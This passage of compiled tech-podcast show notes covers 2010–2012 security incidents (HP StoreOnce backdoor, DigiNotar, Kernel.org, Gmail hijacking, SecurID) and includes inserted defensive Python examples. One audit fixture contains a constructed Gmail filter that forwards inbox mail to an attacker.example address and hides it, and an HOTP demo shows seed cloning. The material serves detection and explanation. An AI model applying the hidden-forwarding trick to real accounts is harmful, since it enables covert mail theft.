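# secrets.token_bytes(32) per user and hands it back as text or a QR code.
DEMO_KEY = bytes(range(32))

# Hypothetical heuristic: a password-ish label, optional "is", optional ":" or
# "=", then a single token that ends the line. Expect some false positives.
PASSWORD_RE = re.compile(
    r"^(?P<label>.*?\bpass(?:word|code)\b[ \t]*(?:is)?[ \t]*[:=]?[ \t]*)(?P<secret>\S+)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)
TOKEN_RE = re.compile(r"ENC\[[A-Za-z0-9_=-]+\]")


def find_plaintext_passwords(body: str) -> list[str]:
    return [m.group("secret") for m in PASSWORD_RE.finditer(body)]


def _subkey(master_key: bytes, purpose: bytes) -> bytes:
    return hmac.new(master_key, purpose, hashlib.sha256).digest()


def _keystream(enc_key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 as a PRF in counter mode: a stdlib-only stream cipher."""
    out = bytearray()
    for counter in range((length + 31) // 32):
        out += hmac.new(enc_key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
    return bytes(out[:length])


def encrypt_secret(master_key: bytes, secret: str) -> str:
    """Encrypt-then-MAC under keys derived from master_key; random 16-byte nonce."""
    enc_key, mac_key = _subkey(master_key, b"enc"), _subkey(master_key, b"mac")
    nonce = secrets.token_bytes(16)
    pt = secret.encode("utf-8")
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(enc_key, nonce, len(pt))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:16]
    return "ENC[" + base64.urlsafe_b64encode(nonce + ct + tag).decode("ascii") + "]"


def decrypt_secret(master_key: bytes, token: str) -> str:
    if not TOKEN_RE.fullmatch(token):
        raise ValueError("not an ENC token")
    blob = base64.urlsafe_b64decode(token[4:-1])
    if len(blob) < 32:
        raise ValueError("token too short")
    nonce, ct, tag = blob[:16], blob[16:-16], blob[-16:]
    enc_key, mac_key = _subkey(master_key, b"enc"), _subkey(master_key, b"mac")
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()[:16]
    if not hmac.compare_digest(tag, expected):  # wrong key or tampered token
        raise ValueError("token failed integrity check")
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct)))).decode("utf-8")


def sweep_message(raw: bytes, master_key: bytes | None = None) -> tuple[EmailMessage, list[str]]:
    """Return a rewritten copy of the message and the secrets found in it.
    master_key=None redacts; otherwise each secret becomes an ENC[...] token."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found: list[str] = []
    for part in msg.walk():
        if part.get_content_type() != "text/plain":
            continue
        before = len(found)

        def _replace(m: re.Match) -> str:
            found.append(m.group("secret"))
            new = "[REDACTED]" if master_key is None else encrypt_secret(master_key, m.group("secret"))
            return m.group("label") + new

        new_body = PASSWORD_RE.sub(_replace, part.get_content())
        if len(found) > before:
            # A real sweep would IMAP APPEND this copy and flag the original \Deleted.
            part.set_content(new_body)
    return msg, found


def find_enc_tokens(text: str) -> list[str]:
    return TOKEN_RE.findall(text)
```

The design point is that the master key never leaves the user: the service stores only the ENC[...] tokens inside the mailbox, so a later compromise of the mailbox (or of the service) yields ciphertext with an integrity tag, and a wrong or tampered key fails closed rather than returning garbage.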

$80,000 HP Backup device contains undocumented support user with fixed password

  • HP announced that their D2D/StoreOnce deduplication backup products contained a flaw
  • It seems there is an undocumented support user, named ‘HPSupport’, with a fixed 7-character password
  • That means that if a person were to brute force that password, they would have SSH access to every StoreOnce device deployed around the world
  • It just so happens, that is what someone has done, and they have even been helpful enough to provide the SHA1 hash of the password, so with a little effort, everyone else can brute force the password too
  • HP will release a patch to disable this account on July 7th
  • “In the interim, customers who wish to disable the backdoor can contact HP support for assistance on this,” the advisory noted. “HP support personnel will provide the assistance to manually disable the HPSupport user account.”
  • Full Disclosure researcher
  • HP Said: “HP identified a potential security issue with older HP StoreOnce models. This does not impact StoreOnce systems with the current version 3.0 software, including the HP StoreOnce B6200 and HP StoreOnce VSA product offerings. HP takes security issues very seriously and is working actively on a fix.”

  • In December 2010, a similar problem was exposed with some HP NAS devices
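Until the July 7th patch lands, the practical check is whether anyone has been authenticating as the undocumented account. The following Python is an added example (not from HP or from the researcher) that runs a simple detector over constructed OpenSSH auth-log lines: repeated failures for the watched account are reported as a likely brute force of the fixed password, and any success is reported as critical. The log lines, hostnames and IP addresses are made up; the account name is the one named in HP’s advisory.

```python
import re
from collections import Counter
from dataclasses import dataclass

# OpenSSH's auth lines in classic syslog framing. The message part after
# "sshd[pid]:" is what sshd itself emits, so it is the same in a SIEM export.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

# Constructed sample, not from a real appliance.
SAMPLE_LOG = """\
Jun 27 02:14:01 storeonce1 sshd[4021]: Accepted password for backupadmin from 10.20.0.15 port 50112 ssh2
Jun 27 02:14:07 storeonce1 sshd[4033]: Failed password for HPSupport from 198.51.100.23 port 41822 ssh2
Jun 27 02:14:09 storeonce1 sshd[4033]: Failed password for HPSupport from 198.51.100.23 port 41822 ssh2
Jun 27 02:14:11 storeonce1 sshd[4033]: Accepted password for HPSupport from 198.51.100.23 port 41822 ssh2
Jun 27 02:15:30 storeonce1 sshd[4050]: Failed password for invalid user admin from 203.0.113.9 port 39900 ssh2
"""

# The undocumented account named in HP's advisory; extend with any other
# vendor or service accounts that should never log in interactively.
WATCHED_ACCOUNTS = frozenset({"HPSupport"})


@dataclass
class Finding:
    severity: str
    user: str
    src: str
    detail: str


def detect(log_text: str, watched=WATCHED_ACCOUNTS, fail_threshold: int = 2) -> list:
    """Alert on repeated failures or any success for a watched account. Any
    success is critical: there is no legitimate interactive use of the account."""
    findings, failures = [], Counter()
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if not m or m["user"] not in watched:
            continue
        key = (m["user"], m["src"])
        if m["result"] == "Accepted":
            findings.append(Finding("critical", *key, "successful login to undocumented support account"))
        else:
            failures[key] += 1
            if failures[key] == fail_threshold:
                findings.append(Finding("high", *key,
                                        f"{fail_threshold} failed logins, likely brute force of the fixed password"))
    return findings
```

Feed it `journalctl -u ssh --no-pager` output or the appliance’s exported syslog; the threshold is deliberately low because a fixed, short password means the attacker needs very few guesses once the hash is public.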


Mysterious Blue Systems | LAS | s21e05
https://original.jupiterbroadcasting.net/18757/mysterious-blue-systems-las-s21e05/
Sun, 15 Apr 2012 14:01:50 +0000


Games are rushing to Linux, and we cover some of the most original. Plus we dig into the mysterious new backer of the Kubuntu Project.

THEN: A Gmail power tip for Linux users, and so much more!

All this week on, The Linux Action Show!



Matt’s Howto:

For anyone using Ubuntu 11.10 or earlier, you may have found that installing the software desktop-webmail installs okay, but it’s not available to be selected under the preferred application settings. Most likely, you’re looking at Thunderbird only! This segment shows you how to side-step this issue, plus you’ll be able to use this Ubuntu PPA to completely prevent this problem from becoming a show-stopper for you.

Simply do the following in a terminal window:

sudo add-apt-repository ppa:asac/sandbox

sudo apt-get update
sudo apt-get install desktop-webmail

After closing and reopening your browser, try a “mailto” link and watch it open up Gmail (or whatever you have set up under desktop-webmail)

Smarter Google DNS | TechSNAP 21
https://original.jupiterbroadcasting.net/11691/smarter-google-dns-techsnap-21/
Thu, 01 Sep 2011 22:42:23 +0000


Google and openDNS join forces to improve the speed of your downloads, find out what they are doing and how it works!

Plus gmail suffered another man in the middle attack, and Kernel.org gets some egg on their face!

All that and more, on this week’s episode of TechSNAP!


Show Notes:

Another SSL Certificate Authority Compromised, MitM Attack on Gmail

  • Sometime before July 10th, the Dutch Certificate Authority DigiNotar was compromised and the attackers were able to issue a number (apparently as many as 200) of fraudulent certificates, including a wildcard certificate for *.google.com. The attack was only detected by DigiNotar on July 19th. DigiNotar revoked the certificates, and an external security audit determined that all invalid certificates had been revoked. However, it seems that probably the most important certificate, *.google.com, was in fact not revoked. This raises serious questions and seems to point to a cover-up by DigiNotar. Detailed Article Additional Article
  • Newer versions of Chrome were not affected, because Google specifically listed (pinned) the small subset of CAs that would ever be allowed to issue a certificate for Gmail. This also prevents self-signed certificates, which some users fall for regardless of the giant scary browser warning. Chrome Security Notes for June
  • Mozilla and the other browser vendors have taken more direct action than they did with the Comodo compromise. All major browsers have entirely removed the DigiNotar root certificate from their trust list. With the Comodo compromise, the affected certificates were blacklisted, but the rest of the Comodo CA was left untouched. One wonders if this was done as a strong signal to all CAs that they must take security more seriously, or if DigiNotar was in fact cooperating with the Iranian government in its efforts to launch MitM attacks on its citizens. Mozilla Security Blog
  • Part of the issue is that some of the certificates issued were for the browser manufacturers themselves, such as Mozilla.org. With a fake certificate for Mozilla, it is possible that the MitM attacker could block updates to your browser, or worse, feed you a spyware-laden version of the browser.
  • Press Release from Parent Company VASCO
  • Pastebin of the fraudulent Certificate
  • Allan’s blog post about the previous CA compromise, and more detail than can fit even in an episode of TechSNAP

GoogleDNS and OpenDNS launch ‘A Faster Internet’

  • The site promoted a DNS protocol extension called edns-client-subnet, which has the recursive DNS server pass along the IP subnet (not the full IP, for privacy) of the requesting client, to allow the authoritative DNS server to make a better geo-targeting decision.
  • A number of large content distributors and CDNs rely on GeoIP technology at DNS time to direct users to the nearest (and as such, usually fastest) server. However this approach is often defeated when a large portion of users are using GoogleDNS and OpenDNS and all of those requests come from a specific IP range. As this technology takes hold, it should make it possible for the Authoritative DNS servers to target the user rather than the Recursive DNS Server, resulting in more accurate results.
  • Internet Engineering Task Force Draft Specification
  • This change has already started affecting users; many users of services such as iTunes had complained of much slower download speeds when using Google DNS or OpenDNS. This was a result of being sent to a far-away node, and that node getting a disproportionate amount of the total load. Now that this DNS extension has started to come online and is backed by a number of major CDNs, it should alleviate the problem.
  • ScaleEngine is in the process of implementing this, and already has some test edns enabled authoritative name servers online.
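The on-the-wire shape of the option, as an added example (not ScaleEngine’s, Google’s or OpenDNS’s code): build a resolver-to-authoritative query whose OPT record carries an EDNS client-subnet option (option code 8, as standardised in RFC 7871, the published form of the draft linked above) and parse it back out. The builder copies only the first ceil(prefix/8) address bytes with the host bits zeroed, which is the privacy property mentioned above: the authoritative server learns 203.0.113.0/24, never 203.0.113.77. The function names, the transaction ID and the sample addresses are this example’s own.

```python
import ipaddress
import struct

TYPE_OPT = 41          # EDNS0 pseudo-RR (RFC 6891)
ECS_OPTION_CODE = 8    # CLIENT-SUBNET option (RFC 7871)
TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    out = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.rstrip(".").split("."))
    return out + b"\x00"


def build_ecs_option(client_ip: str, source_prefix: int) -> bytes:
    """ECS option body: FAMILY, SOURCE PREFIX-LENGTH, SCOPE PREFIX-LENGTH (0 in
    queries), then only ceil(prefix/8) address bytes with the host bits zeroed."""
    ip = ipaddress.ip_address(client_ip)
    family = 1 if ip.version == 4 else 2
    net = ipaddress.ip_network(f"{ip}/{source_prefix}", strict=False)  # zeroes host bits
    addr = net.network_address.packed[: (source_prefix + 7) // 8]
    body = struct.pack("!HBB", family, source_prefix, 0) + addr
    return struct.pack("!HH", ECS_OPTION_CODE, len(body)) + body


def build_query(qname: str, client_ip: str, source_prefix: int = 24,
                txid: int = 0x1234, udp_size: int = 1232) -> bytes:
    """A recursive resolver's upstream query: header + question + OPT RR carrying ECS."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 1)   # RD set, QDCOUNT=1, ARCOUNT=1
    question = encode_name(qname) + struct.pack("!HH", TYPE_A, CLASS_IN)
    option = build_ecs_option(client_ip, source_prefix)
    # OPT RR: NAME=root, TYPE=41, CLASS=UDP payload size, TTL=ext-RCODE/version/flags (all 0)
    opt_rr = b"\x00" + struct.pack("!HHIH", TYPE_OPT, udp_size, 0, len(option)) + option
    return header + question + opt_rr


def _skip_name(buf: bytes, off: int) -> int:
    while True:
        length = buf[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:      # compression pointer ends the name
            return off + 2
        off += 1 + length


def parse_ecs(packet: bytes):
    """Return (client network, scope prefix length) from the first ECS option, else None."""
    _, _, qd, an, ns, ar = struct.unpack_from("!HHHHHH", packet, 0)
    off = 12
    for _ in range(qd):
        off = _skip_name(packet, off) + 4            # QTYPE + QCLASS
    for _ in range(an + ns):
        off = _skip_name(packet, off)
        rdlen = struct.unpack_from("!HHIH", packet, off)[3]
        off += 10 + rdlen
    for _ in range(ar):
        off = _skip_name(packet, off)
        rtype, _, _, rdlen = struct.unpack_from("!HHIH", packet, off)
        off += 10
        rdata, off = packet[off:off + rdlen], off + rdlen
        if rtype != TYPE_OPT:
            continue
        pos = 0
        while pos + 4 <= len(rdata):
            code, length = struct.unpack_from("!HH", rdata, pos)
            body, pos = rdata[pos + 4:pos + 4 + length], pos + 4 + length
            if code != ECS_OPTION_CODE:
                continue
            family, src_len, scope_len = struct.unpack_from("!HBB", body, 0)
            addr, full = body[4:], {1: 4, 2: 16}.get(family)
            if full is None or len(addr) != (src_len + 7) // 8 or len(addr) > full:
                raise ValueError("malformed ECS option")
            ip = ipaddress.ip_address(addr + b"\x00" * (full - len(addr)))
            # strict=True: RFC 7871 requires the bits beyond the prefix to be zero
            return ipaddress.ip_network(f"{ip}/{src_len}"), scope_len
    return None
```

In a reply the authoritative server echoes the option with SCOPE PREFIX-LENGTH set to how much of the prefix it actually used, which is what lets the recursive resolver cache the answer per client subnet instead of per resolver.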

Kernel.org Compromised

  • Attackers were able to compromise a number of Kernel.org machines
  • Attackers appear to have compromised a single user account, and then through unknown means, gained root access.
  • Attackers replaced the running OpenSSH server with a trojaned version, likely leaking the credentials of users who authenticated against it.
  • Kernel.org is working with the 448 people who have accounts there, to replace their passwords and SSH keys.
  • The attack was only discovered due to an extraneous error message about /dev/mem
  • Additional Article

Feedback:

Q: (DreamsVoid) I have a server setup, and I am wondering what it would take to setup a backup server, that would automatically take over if the first server were to go down. What are some of the ways I could accomplish this?

A: This is a rather lengthy answer, so I have broken it apart and given one possible answer each week for the last few weeks. This week’s solution is Anycast. This is by far the most complicated and resource-intensive solution, but it is also the most scalable.

Standard connections on the Internet are Unicast, meaning they go from a single point to another single point (typically from a client to a specific server). There are also Broadcast (sent to all nodes in the broadcast domain, such as your local LAN) and Multicast (sent to a group of subscribed peers; used extensively by routers to distribute routing table updates, but it does not work across the Internet). Anycast is different from Unicast: instead of sending the packet to a specific host, the packet is sent to the nearest host (nearest in network terms, i.e. hops, not necessarily geographic terms).

The way Anycast works is that your BGP-enabled routers announce a route to your subnet from each of your different locations, and the other routers on the Internet update their routing tables with the route to the location that is the fewest hops away. In this way, your traffic is diverted to the nearest location. If one of your locations goes down, when the other routers stop receiving updates from the downed router they automatically change their route to the next nearest location. If you want only failover, and not to distribute traffic geographically, you can have your backup routers prepend their own AS number to their announcements enough times that the backup location always appears more hops away than the main location, so it is only used if the main one is down.

There are some caveats with this solution. The first is that TCP was never designed for a connection to be redirected to another location mid-stream: if a route change happens in the middle of an active session, that session will not exist at the second location, and the connection will be dropped. This makes Anycast unsuitable for long-lived connections, as routes on the Internet change constantly, routing around faults and congestion. Connections also cannot be made outbound from an Anycast IP, as the return path may end up going to a different server and the response will never be received, so each server needs a regular Unicast address in addition to the Anycast address.

A common way to overcome the limitations of Anycast is to do DNS (which is primarily UDP) via Anycast, and have each location serve a different version of the authoritative zone containing the local IP address of the web server. This way users are routed to the nearest DNS server, which then returns the regular IP of the web server at the same location (this solution suffers from the same problems mentioned above in the Google DNS story). Another limitation is that, to keep the global routing table manageable, most providers will not accept a route for a subnet smaller than a /24, meaning that an entire 256-address subnet must be dedicated to Anycast, and your servers will each still require a regular address in a normal subnet. Announcing routes to the Internet also requires your own Autonomous System number, which is only granted to largish providers, or an ISP willing to announce your subnet under their AS number, which requires a Letter of Authorization from the owner of the IP block.
Hijacking the News | TechSNAP 8
https://original.jupiterbroadcasting.net/9026/hijacking-the-news-techsnap-8/
Thu, 02 Jun 2011 21:32:26 +0000


Google has confirmed that 100s of Gmail accounts were being snooped on, and the targets of this attack are not happy!

The cookie catastrophe in the UK continues, we’ll share the brutal details!

And Find out about the hack that leaked the truth about Tupac.

Plus some great audience submitted questions, and our answers!

Please send in more questions so we can continue doing the Q&A section every week! techsnap@jupiterbroadcasting.com



Show Notes:

Topic: 100s of GMail accounts hacked from China

  • Users were all victims of a phishing scam
  • Attackers used stolen passwords and setup forwarding and delegation to be able to spy on all current and future mail for that account, even if the password was changed
  • Google stresses “It’s important to stress that our internal systems have not been affected—these account hijackings were not the result of a security problem with Gmail itself.”
  • Targets seemed to be politically motivated, going after government officials and journalists
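Gmail’s filter export (Settings, Filters and Blocked Addresses, Export) is an Atom feed with one apps:property per rule setting, which makes the forwarding persistence described above easy to audit offline. The following Python is an added example, not Google’s code: it parses a constructed export and flags any filter that forwards mail, especially one that also archives, trashes or marks it read so the owner never sees the copy. TRUSTED_FORWARD_DOMAINS is an assumption standing in for the account owner’s own domains. Account-level forwarding addresses and delegates are not in this file and have to be checked in the settings pages (or via the Gmail API) separately.

```python
from __future__ import annotations

import xml.etree.ElementTree as ET

ATOM = "{http://www.w3.org/2005/Atom}"
APPS = "{http://schemas.google.com/apps/2006}"

# Constructed sample in the shape of Gmail's "Export filters" file. Not a real export.
SAMPLE_EXPORT = """<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom' xmlns:apps='http://schemas.google.com/apps/2006'>
  <title>Mail Filters</title>
  <entry>
    <category term='filter'></category>
    <title>Mail Filter</title>
    <apps:property name='from' value='newsletter@example.org'/>
    <apps:property name='label' value='Newsletters'/>
    <apps:property name='shouldArchive' value='true'/>
  </entry>
  <entry>
    <category term='filter'></category>
    <title>Mail Filter</title>
    <apps:property name='hasTheWord' value='in:inbox'/>
    <apps:property name='forwardTo' value='collector@attacker.example'/>
    <apps:property name='shouldArchive' value='true'/>
    <apps:property name='shouldTrash' value='true'/>
    <apps:property name='shouldMarkAsRead' value='true'/>
  </entry>
</feed>
"""

# Assumption: addresses at these domains belong to the account owner.
TRUSTED_FORWARD_DOMAINS = frozenset({"example.com"})
HIDING_ACTIONS = ("shouldArchive", "shouldTrash", "shouldMarkAsRead")


def parse_filters(xml_text: str) -> list[dict]:
    """Each <entry> becomes a dict of its apps:property name/value pairs."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [
        {p.get("name"): p.get("value") for p in entry.iter(APPS + "property")}
        for entry in root.iter(ATOM + "entry")
    ]


def audit_filters(filters: list[dict], trusted_domains=TRUSTED_FORWARD_DOMAINS) -> list[tuple]:
    """Flag filters that leak mail elsewhere or hide it from the owner.
    Returns (filter index, severity, explanation) tuples."""
    findings = []
    for i, f in enumerate(filters):
        hides = [a for a in HIDING_ACTIONS if f.get(a) == "true"]
        fwd = f.get("forwardTo")
        if fwd:
            domain = fwd.rsplit("@", 1)[-1].lower()
            severity = "info" if domain in trusted_domains and not hides else "critical"
            why = f"forwards matching mail to {fwd}" + (f" and hides it ({', '.join(hides)})" if hides else "")
            findings.append((i, severity, why))
        elif f.get("shouldTrash") == "true":
            findings.append((i, "medium", "trashes matching mail without forwarding it"))
    return findings
```

A forward to the owner’s own domain that also hides the mail is still rated critical: an attacker who controls a second mailbox at the same domain gets the same effect.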

Topic: PBS website hacked

  • LulzSec, one of the hacker groups from the Sony attacks we discussed last night, managed to gain access to several areas of the PBS website.
  • They published the user login information they were able to siphon from the database
  • They were able to post fake news stories and could have caused serious harm (however, their story was that rapper Tupac Shakur was still alive and living in New Zealand)
  • If they had published specially crafted news stories, they could have infected the computers of visitors to the site, or have caused havoc on the stock market by falsely reporting news about various companies.
  • LulzSec says the attack was in protest about a PBS Frontline episode that was critical of WikiLeaks

Topic: I told you so

https://yro.slashdot.org/story/11/05/27/2249210/BBC-Site-Uses-Cookies-To-Inform-Visitors-of-Anti-Cookie-Law

  • In order to comply with a new UK law governing website cookies, when you visit some BBC websites such as radiotimes.com you will be presented with a message telling you about the new law. This message uses a cookie to remember that it has been displayed to you, and will not appear next time you visit the site, to avoid annoying you.
  • This means they are using a cookie, to tell you about how they are not going to use cookies without your consent.
  • In the future, without the use of something like the Google/Mozilla ‘Do Not Track’ system, users who decline to accept a cookie will be prompted with such warnings every time, because there will be no way to remember their choice without using a cookie.
  • This is why this issue should have been left to the users and the browser manufacturers, who already have the issue well in hand with security settings, private browsing modes, and the do-not-track system.
  • This law will become effectively unenforceable

Topic: Defense Contractor Lockheed Martin compromised by duplicate RSA SecurID Tokens

  • Attackers broke into the secure networks of Lockheed Martin and other government contractors by creating duplicates of RSA SecurID tokens
  • It is not clear what data may have been taken. It is unlikely that this information will ever be released by Lockheed Martin because it is likely highly sensitive.
  • RSA SecurID is a two-factor authentication system. It is designed to thwart key-loggers and similar attacks by combining the usual username/password combination with a dynamic token code that changes every 60 seconds.
  • Senior defense officials claim that while contractors’ networks contain sensitive data, all classified data is on separate, closed networks managed by the U.S. government
  • The Pentagon also uses RSA SecurID tokens, but declined to say how many
  • Apparently the hackers learned how to duplicate the SecurID tokens using information stolen during the Advanced Persistent Threat attack on RSA that we discussed in episode 002 of TechSNAP
  • The RSA attack was followed by targeted malware and phishing attacks on customers who used the RSA SecurID system, in an effort to collect the information necessary to duplicate the SecurID tokens
  • This raises questions about the RSA SecurID system: can it be fixed, or does the entire system need to be redesigned? It seems that it is far too easy to duplicate the SecurID tokens.
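Why a stolen seed equals a duplicated token, as an added example that is not RSA’s algorithm: SecurID’s time-based algorithm was proprietary, so this uses the open event-based HOTP of RFC 4226 as a stand-in. The property is the same: a code is a deterministic function of the seed plus a counter (or clock), so anyone holding the seed produces exactly the codes the real token produces, and the server has no way to tell them apart. The demo also shows the side effect on the legitimate token’s next code and the replay check a verifier must keep. Token, Verifier and seed_theft_demo are this example’s own names; the seed used in the test is RFC 4226’s published test vector.

```python
import hashlib
import hmac
import struct


def hotp(seed: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then
    dynamic truncation to a 31-bit integer, reduced to `digits` decimal digits."""
    mac = hmac.new(seed, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class Token:
    """A hardware or software token is nothing more than a seed and a counter."""
    def __init__(self, seed: bytes, counter: int = 0):
        self.seed, self.counter = seed, counter

    def next_code(self) -> str:
        code = hotp(self.seed, self.counter)
        self.counter += 1
        return code


class Verifier:
    """Server side: checks a code against its own copy of the seed within a
    look-ahead window and never accepts a counter at or below the last one used."""
    def __init__(self, seed: bytes, window: int = 5):
        self.seed, self.window, self.last_counter = seed, window, -1

    def verify(self, code: str) -> bool:
        start = self.last_counter + 1
        for c in range(start, start + self.window):
            if hmac.compare_digest(hotp(self.seed, c), code):
                self.last_counter = c
                return True
        return False


def seed_theft_demo(seed: bytes) -> dict:
    """What a stolen seed buys an attacker: a clone indistinguishable from the
    real token, with the victim's next code burned as a side effect."""
    victim, clone, server = Token(seed), Token(seed), Verifier(seed)
    clone_code = clone.next_code()
    accepted_clone = server.verify(clone_code)          # server cannot tell clone from original
    replayed = server.verify(clone_code)                # same code again: rejected
    victim_code = victim.next_code()                    # victim's token is still at counter 0
    victim_accepted = server.verify(victim_code)        # identical code, already consumed
    victim_resync = server.verify(victim.next_code())   # counter 1 is inside the window
    return {
        "clone_code": clone_code, "victim_code": victim_code,
        "accepted_clone": accepted_clone, "replayed": replayed,
        "victim_accepted": victim_accepted, "victim_resync": victim_resync,
    }
```

The only defences that hold once the seed database is gone are re-seeding every token or adding a factor the seed does not cover (a PIN that is never stored beside the seed, device binding, or a second channel); nothing in the code path can tell a copied seed from the original.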

Q: (Swadhin) What are the differences between the virtualization that we do on our home PC and the virtualization that you people do on enterprise servers?
A: Mostly the virtualization used in enterprises is the same as what you can do on your home PC. One of the main differences is that in an enterprise, they will have many different servers hosting the virtualized systems, but they will all use what is called ‘shared storage’. Usually something like iSCSI. This does not mean that all of the virtual disks reside on the same physical drive, just that they are accessible in a single place. The advantage to this system is that it becomes possible to ‘migrate’ a virtual machine from one physical host to another, without rebooting the virtual machine. The disk is not moved at all, so all that happens is the memory footprint is transferred between the first host and a second host. Then the virtual machine is paused, and any changes in the memory footprint are synchronized, and the virtual machine is unpaused on the new host. This allows for individual physical host machines to be shutdown for maintenance without taking down the virtual machines hosted there. It also allows for load balancing, if a few virtual machines on the same physical host are very busy, one or more of them can be moved to other less busy hosts to maintain the highest possible performance. Another feature of this system is to allow you to maximize the efficiency of your hardware. Some physical machines can be turned off when the load level is lower, and then if the currently running machines are approaching their maximum load levels, you can turn some more physical machines on, and have the load balanced to them. Then when the load levels fall again, you can turn some physical machines back off. This reduces your power usage, and makes sure you don’t have a bunch of servers just sitting around idle wasting electricity and running up your cooling bill.


Q: (Alexander) I am building a new home network for my roommates and I at college, we plan to build a virtualization server as described on the ‘build your own cloud’ episode of LAS. I have a few questions:

  1. Should I buy a managed or an unmanaged switch?

A: Likely you do not need a managed switch. Managed switches provide features like VLANs, a way to break the switch up into logical groups of ports and simulate having multiple separate switches (which can even span physical switches). This functionality is good for keeping different parts of the network separate (like having a DMZ to put your servers in, and then separate internal LANs), but is likely unnecessary in your setup. You can save yourself 100s of dollars by just getting an unmanaged switch.

  2. Should I build a virtualization server and a storage server, or one that functions as both?

A: The advantage to having the storage server setup, if you use something like iSCSI for the storage system, is the ability to move the virtual machines between physical hosts. This is really only helpful if you have more than 1 virtualization server, so again, you can probably save money by building only a single server.

  3. How much power would you think a system like this would draw?

A: That depends, you would be able to see that in the specs for the server when you go to buy it, but overall not that much. Hard drives draw fairly little power, and a quad core processor is usually between 94 and 135 watts, unless you get a lower power version. Servers also tend to have higher efficiency power supplies, at least 80% efficient, so less of the power draw is exhausted as waste heat.

  4. How would I run multiple web servers in my network and have them all accessible to the outside world with only one external IP address?

A: If you only have a single external IP, your options are fairly limited. Either you run each web server on a different port, which is cumbersome for the users, or you use a reverse proxy to do virtual hosting. All web servers are capable of doing virtual hosting, that is, serving a different site based on the ‘Host’ header that the user’s browser sends when it requests a page. The idea here would be to set up something like NGINX or lighttpd to listen on your single IP, and then route the connection to the right internal web server based on the hostname or path that is being requested. This solution also works for routing different parts of a website to different internal servers while maintaining a single ‘domain’, which can be important for cookies and for the JavaScript and Flash same-origin policies.
Reverse Proxy: https://nginx.org/


User submitted War Story:
(StayFrosty) I was building a new Windows 2008 R2 server for a small business client of mine. The machine was little more than a glorified desktop, but it had a support contract. After installing the OS I started installing the drivers, and noticed that there was a BIOS update. I figured that since the machine was not in production yet, I might as well install that too. During the flashing process, one of the steps failed. I flipped the KVM over to use a different machine to research the problem; while doing so, I heard the fans in the server spin down and then back up. The machine had rebooted automatically to install some Windows updates. When I flipped the KVM back, nothing but a black screen. Luckily, when I contacted the hardware provider, they told me about the BIOS recovery jumper and I was able to get the machine back online.

Gawker Hacked | J@N | 12.15.10
https://original.jupiterbroadcasting.net/4106/gawker-hacked-jn-121510/
Wed, 15 Dec 2010 22:32:53 +0000


Gawker’s recent bad luck spells real trouble for Chris! He’ll share his tale of woes in tonight’s show. Plus some great tools to improve your password habits!


Gawker Account Information Compromised
https://www.wired.com/threatlevel/2010/12/gawker-hacked/
https://thenextweb.com/media/2010/12/13/gawker-hackers-release-file-with-ftp-author-reader-usernamespasswords/

A ridiculously comprehensive write-up and follow-up editorial
https://blogs.forbes.com/firewall/2010/12/13/the-lessons-of-gawkers-security-mess/

WAS I HACKED?
https://www.slate.com/id/2277768/

Top 50 Gawker User Passwords – LOL

Is it a hacking TREND?
https://www.fastcompany.com/1709836/expert-hackers-might-be-in-a-pissing-contest-companies-should-be-on-red-alert
McDonald’s, DeviantART and Walgreens now also on the “been hacked” list

Was it 4chan’s users?  Apparently not…
https://techshrimp.com/2010/12/13/gawker-website-hacked-by-gnosis-gnosis-says-they-are-not-4chan-or-anonymous/

Interview with a group named “Gnosis” that is claiming responsibility
https://thenextweb.com/media/2010/12/14/an-interview-with-gnosis-the-group-behind-the-gawker-hacking/

PREVENTION

LastPass can generate random passwords and remember them for you
https://lastpass.com/

SuperGen Pass

Something you have, something you know: Yubikey

Get CRAZY with your passwords: https://www.grc.com/passwords.htm
